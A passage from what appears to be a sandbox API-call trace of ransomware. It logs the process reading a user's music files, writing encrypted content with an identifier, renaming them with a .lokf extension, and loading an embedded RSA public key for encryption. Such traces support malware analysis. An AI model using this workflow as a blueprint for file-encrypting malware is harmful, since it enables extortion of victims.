RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0060.522] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.522] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.522] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85ed8 [0060.522] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0060.522] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0060.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0060.522] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0060.522] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.522] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ea8 | out: hHeap=0x660000) returned 1 [0060.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85ea8 [0060.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0060.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0060.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0060.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0060.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0060.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ea8 | out: hHeap=0x660000) returned 1 [0060.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0060.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0060.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8478 | out: hHeap=0x660000) returned 1 [0060.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0060.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0060.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0060.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0060.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ed8 | out: hHeap=0x660000) returned 1 [0060.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ec0 | out: hHeap=0x660000) returned 1 [0060.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e90 | out: hHeap=0x660000) returned 1 [0060.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0060.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0060.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0060.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e78 | out: hHeap=0x660000) returned 1 [0060.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c89568 | out: hHeap=0x660000) returned 1 [0060.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0060.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0060.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0060.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0060.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0060.524] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c8bae8*, nNumberOfBytesToWrite=0x10d97, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c8bae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x10d97, lpOverlapped=0x0) returned 1 [0060.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c8bae8 | out: hHeap=0x660000) returned 1 [0060.524] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10d9c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.524] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.525] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0060.525] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0060.525] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0060.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0060.525] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x32947b0 [0060.525] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.525] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0060.525] WriteFile (in: hFile=0x5cc, lpBuffer=0x32947b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x32947b0*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0060.525] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.525] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.525] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.525] CloseHandle (hObject=0x5cc) returned 1 [0060.526] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290398 [0060.526] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0060.526] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290398 | out: hHeap=0x660000) returned 1 [0060.526] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\WQ3CvenEAYLHrobZJZN.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\wq3cveneaylhrobzjzn.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\WQ3CvenEAYLHrobZJZN.wav.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\wq3cveneaylhrobzjzn.wav.lokf")) returned 1 [0060.527] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.527] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.527] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.528] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228c60 | out: hHeap=0x660000) returned 1 [0060.528] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18ad04f0, ftCreationTime.dwHighDateTime=0x1d4c82e, ftLastAccessTime.dwLowDateTime=0xe5430050, ftLastAccessTime.dwHighDateTime=0x1d4d42c, ftLastWriteTime.dwLowDateTime=0xe5430050, ftLastWriteTime.dwHighDateTime=0x1d4d42c, nFileSizeHigh=0x0, nFileSizeLow=0x11c02, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z-23Z6qoTq8B67.m4a", cAlternateFileName="Z-23Z6~1.M4A")) returned 1 [0060.528] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8478 [0060.528] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0060.528] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8478 | out: hHeap=0x660000) returned 1 [0060.528] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\Z-23Z6qoTq8B67.m4a") returned=".m4a" [0060.528] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\Z-23Z6qoTq8B67.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\z-23z6qotq8b67.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.528] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=72706) returned 1 [0060.528] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.530] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x11bdc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.530] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.531] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.531] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.531] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.531] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x11c02, lpOverlapped=0x0) returned 1 [0060.532] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.532] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.532] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.532] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.532] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8478) returned 1 [0060.532] CryptCreateHash (in: hProv=0x6b8478, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.532] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.532] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.532] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.533] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.533] GetLastError () returned 0x0 [0060.533] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.533] CryptReleaseContext (hProv=0x6b8478, dwFlags=0x0) returned 1 [0060.533] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.533] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.533] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.533] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.533] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11c00) returned 0x9c8bae8 [0060.533] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.533] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c89568 [0060.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85e78 [0060.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c895b0 [0060.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85e90 [0060.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ec0 [0060.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ed8 [0060.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.534] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.534] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ec0 | out: hHeap=0x660000) returned 1 [0060.541] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ed8 | out: hHeap=0x660000) returned 1 [0060.541] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.541] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.541] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.541] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.541] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0060.541] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85ed8 [0060.541] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0060.541] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85ec0 [0060.541] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0060.541] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.541] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.541] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.541] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.541] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.541] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0060.541] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.541] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.541] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ed8 | out: hHeap=0x660000) returned 1 [0060.541] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.541] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ec0 | out: hHeap=0x660000) returned 1 [0060.541] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.541] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.541] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.542] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.542] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.542] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.542] GetCurrentThreadId () returned 0x9e0 [0060.542] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0060.542] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8af40 [0060.542] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.542] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8478 [0060.542] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.542] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.542] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.542] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.542] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.542] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.542] GetCurrentThreadId () returned 0x9e0 [0060.542] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.542] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.542] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0060.542] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.542] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.542] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.542] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.542] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.542] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.542] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.542] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.542] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.542] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.542] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.542] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.542] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.542] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.542] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.542] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.542] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.543] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.543] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.543] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.543] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ec0 [0060.543] HeapFree (in: hHeap=0x660000, dwFlags=0x0, 